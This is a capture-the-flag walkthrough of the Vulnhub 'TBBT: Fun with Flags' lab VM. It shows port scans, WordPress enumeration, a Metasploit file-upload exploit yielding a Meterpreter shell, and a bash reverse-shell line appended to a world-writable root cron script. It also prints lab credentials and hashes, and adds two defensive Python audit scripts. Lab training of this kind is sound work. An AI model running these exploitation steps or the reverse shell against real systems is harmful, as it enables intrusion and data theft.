TBBT: Fun with Flags — Walkthrough

Mr. Robot
InfoSec Adventures
Mar 14, 2020

Description from Vulnhub

Welcome to "Fun with Flags"!

This boot2root machine is themed after the famous TV show, The Big Bang Theory. To successfully complete the challenge you will need to get all 7 flags, one for each main character and get root access.

Difficulty: Easy / Beginner Level

Need hints? Twitter @emaragkos

- Runs better with VirtualBox
- DHCP is disabled - Static IP 192.168.1.105
- If you have problems setting a lab with a specific subnet 192.168.1.0/24

Tutorial: https://emaragkos.gr/tutorials/vulnhub-vm-with-static-ip/

Good luck and have fun :)

Download link: https://www.vulnhub.com/entry/tbbt-funwithflags,437/

Port Scanning

First things first, I did an extensive port scan with all ports, version / OS enumeration which gave me the following result.

t0thkr1s@kali ~> sudo nmap -A -Pn -p- 192.168.1.105
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 11:24 CDT
Nmap scan report for 192.168.1.105
Host is up (0.00084s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.67
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fun with flags!
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.80%I=7%D=3/13%Time=5E6BB3B4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(GenericLine
SF:s,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(GetRequest,2
....

As you can see, we already have some low-hanging fruit: our first flag. Let’s connect to port 1337 using ncat and grab Sheldon's flag.

t0thkr1s@kali ~> ncat 192.168.1.105 1337
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}

FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}

Directory Fuzzing

I fired up a quick dirb scan, which turned out to be pretty helpful. In the meantime, I checked the robots.txt file, which didn't yield anything useful.

t0thkr1s@kali ~> dirb http://192.168.1.105

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Mar 13 14:52:23 2020
URL_BASE: http://192.168.1.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.105/ ----
+ http://192.168.1.105/index.html (CODE:200|SIZE:239)
==> DIRECTORY: http://192.168.1.105/javascript/
==> DIRECTORY: http://192.168.1.105/music/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
==> DIRECTORY: http://192.168.1.105/private/
+ http://192.168.1.105/robots.txt (CODE:200|SIZE:112)
+ http://192.168.1.105/server-status (CODE:403|SIZE:301)

---- Entering directory: http://192.168.1.105/javascript/ ----
==> DIRECTORY: http://192.168.1.105/javascript/jquery/

---- Entering directory: http://192.168.1.105/music/ ----
+ http://192.168.1.105/music/index.html (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.105/music/wordpress/

---- Entering directory: http://192.168.1.105/phpmyadmin/ ----
==> DIRECTORY: http://192.168.1.105/phpmyadmin/doc/
+ http://192.168.1.105/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.1.105/phpmyadmin/index.php (CODE:200|SIZE:10344)
==> DIRECTORY: http://192.168.1.105/phpmyadmin/js/
+ http://192.168.1.105/phpmyadmin/libraries (CODE:403|SIZE:308)
==> DIRECTORY: http://192.168.1.105/phpmyadmin/locale/
+ http://192.168.1.105/phpmyadmin/phpinfo.php (CODE:200|SIZE:10346)
+ http://192.168.1.105/phpmyadmin/setup (CODE:401|SIZE:460)
==> DIRECTORY: http://192.168.1.105/phpmyadmin/sql/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/templates/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/themes/

---- Entering directory: http://192.168.1.105/private/ ----
==> DIRECTORY: http://192.168.1.105/private/css/
+ http://192.168.1.105/private/index.php (CODE:200|SIZE:685)

---- Entering directory: http://192.168.1.105/javascript/jquery/ ----
+ http://192.168.1.105/javascript/jquery/jquery (CODE:200|SIZE:284394)

---- Entering directory: http://192.168.1.105/music/wordpress/ ----
+ http://192.168.1.105/music/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-admin/
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-content/
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-includes/
+ http://192.168.1.105/music/wordpress/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.1.105/phpmyadmin/doc/ ----
==> DIRECTORY: http://192.168.1.105/phpmyadmin/doc/html/

---- Entering directory: http://192.168.1.105/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.1.105/phpmyadmin/js/jquery/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/js/transformations/
....

The /private directory hosts a small website riddled with SQL injection, and a WordPress site popped up under the /music directory. Let's investigate further!

WordPress Enumeration

When it comes to WordPress, hands down my favorite tool is wpscan. After a couple of minutes, I had some juicy information.

t0thkr1s@kali ~> wpscan --url http://192.168.1.105/music/wordpress/ -e
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.7.9
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.1.105/music/wordpress/ [192.168.1.105]
[+] Started: Fri Mar 13 11:36:49 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.105/music/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.1.105/music/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Registration is enabled: http://192.168.1.105/music/wordpress/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.105/music/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.1.105/music/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.105/music/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.1.105/music/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/
| Latest Version: 1.1 (up to date)
| Last Updated: 2020-02-25T00:00:00.000Z
| Readme: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/readme.txt
| Style URL: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] reflex-gallery
| Location: http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
| Fixed in: 3.1.4
| References:
| - https://wpvulndb.com/vulnerabilities/7867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
| - https://www.exploit-db.com/exploits/36374/
| - https://packetstormsecurity.com/files/130845/
| - https://packetstormsecurity.com/files/131515/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
|
| [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpvulndb.com/vulnerabilities/7985
| - https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
| - https://github.com/scaron/prettyphoto/issues/149
| - https://github.com/wpscanteam/wpscan/issues/818
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:00 <=======================================> (325 / 325) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:05 <=====================================> (2575 / 2575) 100.00% Time: 00:00:05
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==========================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <==============================================> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:01 <===================================> (100 / 100) 100.00% Time: 00:00:01
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] footprintsonthemoon
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] stuart
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] kripke
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 47
[+] Finished: Fri Mar 13 11:37:04 2020
[+] Requests Done: 3089
[+] Cached Requests: 38
[+] Data Sent: 871.978 KB
[+] Data Received: 611.919 KB
[+] Memory used: 235.43 MB
[+] Elapsed time: 00:00:14

The tool identified 3 users, but that’s not interesting in this case. I focused on the Reflex Gallery plugin, which is vulnerable to arbitrary file upload. I had the pleasure of exploiting this vulnerability before, and I knew there was a handy Metasploit module for it. I encourage you to exploit it manually; I was too lazy…

t0thkr1s@kali ~> msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
msf5 >
msf5 > search reflex
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability
msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > options
Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Reflex Gallery 3.1.3
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set rhosts 192.168.1.105
rhosts => 192.168.1.105
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set targeturi /music/wordpress
targeturi => /music/wordpress
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > options
Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.105 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /music/wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Reflex Gallery 3.1.3
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.67:4444
[+] Our payload is at: YFnNenxtIkRaeh.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38288 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.105:50508) at 2020-03-13 11:39:20 -0500
[+] Deleted YFnNenxtIkRaeh.php
meterpreter >
meterpreter > getuid
Server username: www-data (33)

It’s enumeration time! I went straight to the home directories and started poking around. I found my second flag in penny’s home directory; it was base64-encoded.

meterpreter > ls
Listing: /home/penny
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100664/rw-rw-r-- 61 fil 2020-03-04 16:26:42 -0600 .FLAG.penny.txt
100600/rw------- 57 fil 2020-03-05 16:47:49 -0600 .bash_history
100644/rw-r--r-- 220 fil 2015-08-31 18:26:22 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2015-08-31 18:26:22 -0500 .bashrc
40700/rwx------ 4096 dir 2020-03-05 16:37:36 -0600 .cache
40775/rwxrwxr-x 4096 dir 2020-03-04 16:26:31 -0600 .nano
100644/rw-r--r-- 655 fil 2017-05-16 07:48:06 -0500 .profile
meterpreter > cat .FLAG.penny.txt
RkxBRy1wZW5ueXtkYWNlNTJiZGIyYTBiM2Y4OTlkZmIzNDIzYTk5MmIyNX0=

FLAG-penny{dace52bdb2a0b3f899dfb3423a992b25}

In amy’s home directory there was a note and a strange binary. I downloaded the binary to my machine to analyze it.

meterpreter > ls
Listing: /home/amy
==================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 166 fil 2020-03-05 16:47:49 -0600 .bash_history
100644/rw-r--r-- 220 fil 2015-08-31 18:26:22 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2015-08-31 18:26:22 -0500 .bashrc
40700/rwx------ 4096 dir 2020-03-03 18:18:15 -0600 .cache
40775/rwxrwxr-x 4096 dir 2020-03-03 17:34:44 -0600 .nano
100644/rw-r--r-- 655 fil 2017-05-16 07:48:06 -0500 .profile
100777/rwxrwxrwx 434 fil 2020-03-04 08:30:02 -0600 notes.txt
100755/rwxr-xr-x 7488 fil 2020-03-05 16:06:57 -0600 secretdiary
meterpreter > cat notes.txt
This is my secret diary.
The safest way to keep my secrets is inside a compiled executable program.
As soon as I get popular now, that I have friends, I will start adding my secrets here.
I have used a really strong password that it cant be bruteforced.
Seriously it is 18 digit, alphanumeric, uppercase/lowercase with symbols.
And since my program is already compiled, no one can read the source code in order to view the password!
meterpreter > download secretdiary
[*] Downloading: secretdiary -> secretdiary
[*] Downloaded 7.31 KiB of 7.31 KiB (100.0%): secretdiary -> secretdiary
[*] download : secretdiary -> secretdiary

I ran strings on the binary, which revealed not only the password but also amy's flag.

t0thkr1s@kali ~> strings secretdiary 
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
PTRh`
UWVS
t$,U
[^_]
Enter your username:
Enter your password:
P@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist
;*2$"(
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7209
....

FLAG-amy{60263777358690b90e8dbe8fea6943c9}
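As an added example (not code from the walkthrough or from the box), here is a minimal reimplementation of what strings did to secretdiary, plus a heuristic that picks out any string matching amy's own description of her password. The byte buffer is a constructed stand-in for the binary, built from the literals the strings output above printed; the function names are my own.

```python
import re
import string

# Constructed stand-in for amy's "secretdiary" binary: a few non-printable
# bytes wrapped around the same string literals that `strings` printed in the
# walkthrough. This is not the real ELF file from the box.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"Enter your username:\x00"
    + b"Enter your password:\x00"
    + b"P@SSw0rd123Sh3ld0n\x00"              # the hard-coded password
    + b"Login Success!\x00"
    + b"FLAG-amy{60263777358690b90e8dbe8fea6943c9}\x00"
    + b"Wrong password! YOY WILL NEVER READ MY SECRETS\x00"
    + b"\x55\x57\x56\x53\xe8\x00\x00\x00"    # push ebp/edi/esi/ebx; call ... ("UWVS")
)

FLAG_RE = re.compile(r"FLAG-\w+\{[0-9a-f]{32}\}")


def extract_strings(data, min_len=4):
    """Return runs of at least min_len printable ASCII bytes, as `strings -n` does.

    Printable means 0x20..0x7e plus tab, matching GNU strings' default.
    Code bytes that happen to be printable (e.g. b"UWVS") come out too,
    which is why the raw output above contains junk lines.
    """
    found, run = [], bytearray()
    for byte in data:
        if 0x20 <= byte <= 0x7E or byte == 0x09:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def looks_like_password(s):
    """Heuristic from amy's own note: long, mixed case, digits and symbols, no spaces."""
    return (
        len(s) >= 12
        and " " not in s
        and any(c.islower() for c in s)
        and any(c.isupper() for c in s)
        and any(c.isdigit() for c in s)
        and any(c in string.punctuation for c in s)
    )


def find_secrets(data, min_len=4):
    """Split the extracted strings into CTF flags and password candidates."""
    result = {"flags": [], "password_candidates": []}
    for s in extract_strings(data, min_len):
        match = FLAG_RE.search(s)
        if match:
            result["flags"].append(match.group(0))
        elif looks_like_password(s):
            result["password_candidates"].append(s)
    return result


if __name__ == "__main__":
    for line in extract_strings(SAMPLE_BINARY):
        print(line)
    print(find_secrets(SAMPLE_BINARY))
```

The lesson for the defender is the one amy got wrong: a compiled binary hides nothing from a byte scan, so credentials belong in a file with restrictive permissions or a secret store, never in the source.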

Privilege Escalation

Leonard’s directory contained a shell script with some comments in it. After reading it through, I realized this was my privilege escalation vector: the script is owned by root, world-writable, and gets executed every minute. I just had to append a Bash reverse shell line to it.

www-data@tbbt:/home/leonard$ ls -la
total 24
drwxr-xr-x 2 leonard leonard 4096 Mar 6 00:47 .
drwxr-xr-x 10 root root 4096 Mar 4 02:33 ..
-rw------- 1 leonard leonard 0 Mar 6 00:47 .bash_history
-rw-r--r-- 1 leonard leonard 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 leonard leonard 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 leonard leonard 655 May 16 2017 .profile
-rwxrwxrwx 1 root root 484 Mar 6 00:23 thermostat_set_temp.sh
www-data@tbbt:/home/leonard$ cat thermostat_set_temp.sh
#!/bin/bash
# This script is empty for now, I will code it as soon as I have free time.
# This script will secretly connect to our IoT thermostat and always set the
# temperature in the value I wish overiding Sheldons' settings without him even knowing.
# Even if Sheldon changes the value my script is already configured to run every minute
# and change the value again and again!
# I am so smart
# Now I just have to code it...
# MAKE API CALL TO THERMOSTAT TO SET TEMP_VALUE=22
www-data@tbbt:/home/leonard$ echo "bash -i >& /dev/tcp/192.168.1.67/9999 0>&1" >> thermostat_set_temp.sh
www-data@tbbt:/home/leonard$ cat thermostat_set_temp.sh
#!/bin/bash
# This script is empty for now, I will code it as soon as I have free time.
# This script will secretly connect to our IoT thermostat and always set the
# temperature in the value I wish overiding Sheldons' settings without him even knowing.
# Even if Sheldon changes the value my script is already configured to run every minute
# and change the value again and again!
# I am so smart
# Now I just have to code it...
# MAKE API CALL TO THERMOSTAT TO SET TEMP_VALUE=22
bash -i >& /dev/tcp/192.168.1.67/9999 0>&1
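As an added example that is not part of the original walkthrough, here is a small Python audit for exactly this weakness: it parses /etc/crontab-style entries and flags any file a job's command references that is writable by users other than the job's owner. The crontab content, the file names and the function names are constructed; the box's real cron entry is not shown in the post.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab-style content. The walkthrough says the script runs
# every minute as root but never shows the crontab line, so this one is assumed.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
*  *  * * *  root  {thermostat}
@reboot      root  {startup}
"""


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d syntax.

    Handles comments, VAR=value lines, the five-field schedule and the
    @reboot/@hourly shorthands. Per-user crontabs (crontab -l) have no user
    column and are not covered here.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:          # environment assignment
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)    # @shorthand user command
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
        else:
            fields = line.split(None, 6)    # m h dom mon dow user command
            if len(fields) == 7:
                jobs.append((fields[5], fields[6]))
    return jobs


def audit_path(path, trusted_uid):
    """Reasons why someone other than the cron user could modify this file."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append("owned by uid %d, not the cron user" % st.st_uid)
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable (%s)" % stat.filemode(st.st_mode))
    elif st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable (%s)" % stat.filemode(st.st_mode))
    return reasons


def audit_crontab(text, resolve_uid=None):
    """Map every existing file referenced by a job's command to its weaknesses.

    resolve_uid maps a cron user name to a uid; by default it uses the
    password database, which is what you want on a real host.
    """
    if resolve_uid is None:
        import pwd
        resolve_uid = lambda user: pwd.getpwnam(user).pw_uid
    report = {}
    for user, command in parse_system_crontab(text):
        for token in command.split():
            if token.startswith("/") and os.path.isfile(token):
                reasons = audit_path(token, resolve_uid(user))
                if reasons:
                    report[token] = reasons
    return report


def demo_report():
    """Build a throwaway fixture mirroring the box and audit it.

    Returns (report, weak_path, ok_path). The demo runs unprivileged, so the
    current uid stands in for root as the "cron user".
    """
    tmp = tempfile.mkdtemp()
    weak = os.path.join(tmp, "thermostat_set_temp.sh")   # 0777 like the box
    ok = os.path.join(tmp, "start_thermostat.sh")        # 0755, the sane setting
    for path, mode in ((weak, 0o777), (ok, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n# placeholder\n")
        os.chmod(path, mode)
    text = SAMPLE_CRONTAB.format(thermostat=weak, startup=ok)
    report = audit_crontab(text, resolve_uid=lambda user: os.getuid())
    return report, weak, ok


if __name__ == "__main__":
    report, weak, ok = demo_report()
    for path, reasons in report.items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

On a real host, run it over /etc/crontab and each file in /etc/cron.d as root; a script executed by root that anyone can write is a root shell waiting to happen, and the fix is chmod 755 (or 700) plus root ownership.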

I didn’t have to wait long to get a connection back with root privileges. However, this was not the end of the journey: there were still flags out there that I had missed.

t0thkr1s@kali ~> ncat -lvp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.1.105.
Ncat: Connection from 192.168.1.105:37632.
bash: cannot set terminal process group (2096): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# cd /root
cd /root
root@tbbt:~# ls
FLAG-leonard.txt
root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}
I hope you liked it!
root@tbbt:~#

FLAG-leonard{17fc95224b65286941c54747704acd3e}

I checked the locally listening ports and confirmed that the MySQL server (port 3306) was up and running.

root@tbbt:~# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:*
tcp 0 0 0.0.0.0:1337 0.0.0.0:*
tcp 0 0 127.0.0.1:3306 0.0.0.0:*
tcp 0 0 192.168.1.105:38046 192.168.1.67:9999
tcp 1 0 192.168.1.105:37740 192.168.1.67:9999

I went into the /var/www/html/private/ directory and found db_config.php with database credentials in it. I used Python to spawn a pseudo-TTY, logged in to the database, listed all the users and found another flag.

root@tbbt:/var/www/html/private# ls
css
db_config.php
index.php
login.php
searchproducts.php
root@tbbt:/var/www/html/private# cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = 'weareevil';
$con=mysqli_connect("127.0.0.1",$DBUSER,$DBPASS,"bigpharmacorp");
// Check connection
if (mysqli_connect_errno($con))
{
echo "<font style=\"color:#FF0000\">Could not connect:". mysqli_connect_error()."</font\>";
}
?>
root@tbbt:/var/www/html/private# python -c 'import pty; pty.spawn("/bin/bash")'
root@tbbt:/var/www/html/private# mysql -u bigpharmacorp -p
Enter password: weareevil
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 158
Server version: 5.7.25-0ubuntu0.16.04.2 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| bigpharmacorp |
+--------------------+
2 rows in set (0.00 sec)
mysql> use bigpharmacorp;
use bigpharmacorp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bigpharmacorp |
+-------------------------+
| products |
| users |
+-------------------------+
2 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
+----+------------+----------------------------------+------------+---------------------------------------------------+
| id | username | password | fname | description |
+----+------------+----------------------------------+------------+---------------------------------------------------+
| 1 | admin | 3fc0a7acf087f549ac2b266baf94b8b1 | josh | Dont mess with me |
| 2 | bobby | 8cb1fb4a98b9c43b7ef208d624718778 | bob | I like playing football. |
| 3 | penny69 | cafa13076bb64e7f8bd480060f6b2332 | penny | Hi I am Penny I am new here!! <3 |
| 4 | mitsos1981 | 05d51709b81b7e0f1a9b6b4b8273b217 | dimitris | Opa re malaka! |
| 5 | alicelove | e146ec4ce165061919f887b70f49bf4b | alice | Eat Pray Love |
| 6 | bernadette | dc5ab2b32d9d78045215922409541ed7 | bernadette | FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f} |
+----+------------+----------------------------------+------------+---------------------------------------------------+
6 rows in set (0.00 sec)
mysql>

